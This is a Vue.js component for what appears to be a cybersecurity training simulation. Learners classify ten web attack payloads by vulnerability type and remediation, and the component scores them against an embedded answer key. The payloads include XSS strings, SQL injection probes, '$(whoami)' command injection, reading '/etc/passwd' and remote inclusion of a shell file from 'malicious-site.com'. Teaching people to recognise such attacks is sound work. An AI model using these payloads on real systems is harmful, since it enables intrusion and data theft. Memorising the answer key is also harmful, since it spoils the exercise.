/* eslint no-use-before-define: 0 */

<template>
  <div class="vx-row Lgx266170912410173440">
    <div class="vx-col w-full">
      <vx-card class="mb-4">
        <div class="fourth-sim pt-0">
          <div class="vx-row mb-4">
            <div class="vx-col w-1/3 flex items-center">
              <h2 class="font-bold">Payloads</h2>
            </div>
            <div class="vx-col w-1/3 flex items-center">
              <h2 class="font-bold">Vulnerability Type</h2>
            </div>
            <div class="vx-col w-1/3 flex items-center">
              <h2 class="font-bold">Remediation</h2>
            </div>
          </div>
          <div class="vx-row items-center border-white border-2 border-solid rounded p-2 my-4" v-for="item in table_items_page_1" :key="item.id" v-if="currentPage === 0">
            <div class="vx-col w-1/3 flex items-center p-3">
              <h4 class="pr-24 break-all">{{ item.payload }}</h4>
            </div>
            <div class="vx-col w-1/3 p-3">
              <v-select placeholder="Select an attack from the dropdown" class="w-full" :options="vulnerability_options" v-model="item.vulnerability"/>
              <small v-if="item.vulnerability_is_correct !== null && item.vulnerability_is_correct === false" class="ml-1 text-danger font-semibold">This answer is
                invalid</small>
              <small v-if="item.vulnerability_is_correct !== null && item.vulnerability_is_correct === true" class="ml-1 text-success font-semibold">This answer is
                correct</small>
            </div>
            <div class="vx-col w-1/3 p-3">
              <v-select placeholder="Select an action from the dropdown" class="w-full" :options="remediation_options" v-model="item.remediation"/>
              <small v-if="item.remediation_is_correct !== null && item.remediation_is_correct === false" class="ml-1 text-danger font-semibold">This answer is
                invalid</small>
              <small v-if="item.remediation_is_correct !== null && item.remediation_is_correct === true" class="ml-1 text-success font-semibold">This answer is
                correct</small>
            </div>
          </div>
          <div class="vx-row items-center border-white border-2 border-solid rounded p-2 my-4" v-for="item in table_items_page_2" :key="item.id" v-if="currentPage === 1">
            <div class="vx-col w-1/3 flex items-center p-3">
              <h4 class="pr-24 break-all">{{ item.payload }}</h4>
            </div>
            <div class="vx-col w-1/3 p-3">
              <v-select placeholder="Select an attack from the dropdown" class="w-full" :options="vulnerability_options" v-model="item.vulnerability"/>
              <small v-if="item.vulnerability_is_correct !== null && item.vulnerability_is_correct === false" class="ml-1 text-danger font-semibold">This answer is
                invalid</small>
              <small v-if="item.vulnerability_is_correct !== null && item.vulnerability_is_correct === true" class="ml-1 text-success font-semibold">This answer is
                correct</small>
            </div>
            <div class="vx-col w-1/3 p-3">
              <v-select placeholder="Select an action from the dropdown" class="w-full" :options="remediation_options" v-model="item.remediation"/>
              <small v-if="item.remediation_is_correct !== null && item.remediation_is_correct === false" class="ml-1 text-danger font-semibold">This answer is
                invalid</small>
              <small v-if="item.remediation_is_correct !== null && item.remediation_is_correct === true" class="ml-1 text-success font-semibold">This answer is
                correct</small>
            </div>
          </div>
        </div>
      </vx-card>
    </div>
    <div class="vx-col w-full">
      <vx-card class="">
        <vs-button color="success" type="filled" icon-pack="feather" icon="icon-arrow-right-circle"
                   style="width: 100%; z-index: 1"
                   class="my-4 font-bold flex" size="large" @click="next_page" v-if="currentPage === 0">Next Page
        </vs-button>
        <vs-button color="danger" type="filled" icon-pack="feather" icon="icon-arrow-left-circle" style="width: 100%"
                   class="my-4 font-bold" size="large" @click="previous_page" v-else>Previous Page
        </vs-button>
      </vx-card>

    </div>
  </div>
</template>

<script>

import vSelect from 'vue-select'
import Prism from 'vue-prism-component'
import shuffle from 'shuffle-array'

export default {
  data () {
    return {

      dataLocal: JSON.parse(JSON.stringify(this.data)),

      currentPage: 0,

      table_items_page_1: [
        {
          id: 1,
          payload: '#inner-tab"><script\\>alert(1)</ script>',
          vulnerability: null,
          vulnerability_answer: 3,
          vulnerability_is_correct: null,
          remediation: null,
          remediation_answer: 5,
          remediation_is_correct: null
        },
        {
          id: 2,
          payload: 'item=widget\';waitfor%20delay%20\'00:00:20\';--',
          vulnerability: null,
          vulnerability_answer: 5,
          vulnerability_is_correct: null,
          remediation: null,
          remediation_answer: 4,
          remediation_is_correct: null
        },
        {
          id: 3,
          payload: 'search=Bob"%3e%3cimg%20src%3da%20oneerror%3dalert(1)%3e',
          vulnerability: null,
          vulnerability_answer: 4,
          vulnerability_is_correct: null,
          remediation: null,
          remediation_answer: 5,
          remediation_is_correct: null
        },
        {
          id: 4,
          payload: 'logfile=%2fetc%2fpasswd%00',
          vulnerability: null,
          vulnerability_answer: 8,
          vulnerability_is_correct: null,
          remediation: null,
          remediation_answer: 3,
          remediation_is_correct: null
        },
        {
          id: 5,
          payload: 'site=www.exa\'ping%20-c%2010%20localhost\'mple.com',
          vulnerability: null,
          vulnerability_answer: 2,
          vulnerability_is_correct: null,
          remediation: null,
          remediation_answer: 5,
          remediation_is_correct: null
        }
      ],

      table_items_page_2: [
        {
          id: 1,
          payload: 'item=widget%20union%20select%20null,null,@@version;--',
          vulnerability: null,
          vulnerability_answer: 6,
          vulnerability_is_correct: null,
          remediation: null,
          remediation_answer: 4,
          remediation_is_correct: null
        },
        {
          id: 2,
          payload: 'item=widget\'+convert(int,@@version)+\'',
          vulnerability: null,
          vulnerability_answer: 2,
          vulnerability_is_correct: null,
          remediation: null,
          remediation_answer: 5,
          remediation_is_correct: null
        },
        {
          id: 3,
          payload: 'logFile=http:%2f%2fwww.malicious-site.com%2fshell.txt',
          vulnerability: null,
          vulnerability_answer: 9,
          vulnerability_is_correct: null,
          remediation: null,
          remediation_answer: 2,
          remediation_is_correct: null
        },
        {
          id: 4,
          payload: 'lookup=$(whoami)',
          vulnerability: null,
          vulnerability_answer: 2,
          vulnerability_is_correct: null,
          remediation: null,
          remediation_answer: 4,
          remediation_is_correct: null
        },
        {
          id: 5,
          payload: 'redir=http:%2f%2fwww.malicious-site.com',
          vulnerability: null,
          vulnerability_answer: 10,
          vulnerability_is_correct: null,
          remediation: null,
          remediation_answer: 3,
          remediation_is_correct: null
        }
      ],

      vulnerability_options: [
        {id: 2, label: 'Command Injection'},
        {id: 3, label: 'DOM-based Cross Site Scripting'},
        {id: 4, label: 'SQL Injection (Error)'},
        {id: 5, label: 'SQL Injection (Stacked)'},
        {id: 6, label: 'SQL Injection (Union)'},
        {id: 7, label: 'Reflected Cross Site Scripting'},
        {id: 8, label: 'Local File Inclusion'},
        {id: 9, label: 'Remote File Inclusion'},
        {id: 10, label: 'URL Redirect'}
      ],

      remediation_options: [
        {id: 2, label: 'Preventing external calls'},
        {id: 3, label: 'Input Sanitization .., \\ , / . sandbox requests'},
        {id: 4, label: 'Input Sanitization " , :, $, (,), (,),'},
        {id: 5, label: 'Input Sanitization ". \' , < . : . > , " , '}
      ]


    }
  },
  methods: {
    markSimulation () {

      let totalScore = 0

      this.table_items_page_1.forEach((x, i) => {
        if (x.vulnerability && x.vulnerability.id === x.vulnerability_answer) {
          this.table_items_page_1[i].vulnerability_is_correct = true
          totalScore++
        } else {
          this.table_items_page_1[i].vulnerability_is_correct = false
        }
        if (x.remediation && x.remediation.id === x.remediation_answer) {
          totalScore++
          this.table_items_page_1[i].remediation_is_correct = true
        } else {
          this.table_items_page_1[i].remediation_is_correct = false
        }
      })

      this.table_items_page_2.forEach((x, i) => {
        if (x.vulnerability && x.vulnerability.id === x.vulnerability_answer) {
          this.table_items_page_2[i].vulnerability_is_correct = true
          totalScore++
        } else {
          this.table_items_page_2[i].vulnerability_is_correct = false
        }
        if (x.remediation && x.remediation.id === x.remediation_answer) {
          totalScore++
          this.table_items_page_2[i].remediation_is_correct = true
        } else {
          this.table_items_page_2[i].remediation_is_correct = false
        }
      })

      if (totalScore === this.dataLocal.simulation.totalScore) {
        return this.$emit('simulation_full_correct', totalScore)
      }

      this.$emit('simulation_getting_there', totalScore)

    },
    previous_page () {
      this.currentPage = 0
    },
    next_page () {
      this.currentPage = 1
    }

  },
  components: {
    Prism,
    vSelect,
    shuffle
  },
  props: {
    data: {
      type: Object,
      required: true
    }
  }

}
</script>
<style>

.Lgx266170912410173440 {
  font-size: 19px;
}

</style>
